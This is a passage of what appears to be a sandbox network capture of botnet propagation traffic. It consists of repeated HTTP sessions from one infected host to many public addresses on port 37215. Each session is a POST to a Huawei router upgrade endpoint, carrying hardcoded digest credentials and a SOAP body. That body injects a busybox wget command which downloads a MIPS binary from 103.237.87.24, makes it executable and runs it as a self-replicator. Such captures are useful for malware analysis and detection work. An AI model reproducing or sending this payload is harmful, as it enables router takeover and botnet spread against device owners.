                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2070192.168.2.135299641.25.81.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576457977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2071192.168.2.1357984197.5.18.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576486111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2072192.168.2.1357366157.18.11.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576494932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2073192.168.2.1349914177.188.68.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576518059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2074192.168.2.133684845.1.72.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576524019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2075192.168.2.133871273.15.195.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576524019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2076192.168.2.1345000157.255.20.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576544046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2077192.168.2.13548702.171.164.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576546907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2078192.168.2.134430665.226.42.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576555967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2079192.168.2.1339764175.12.9.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579206944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
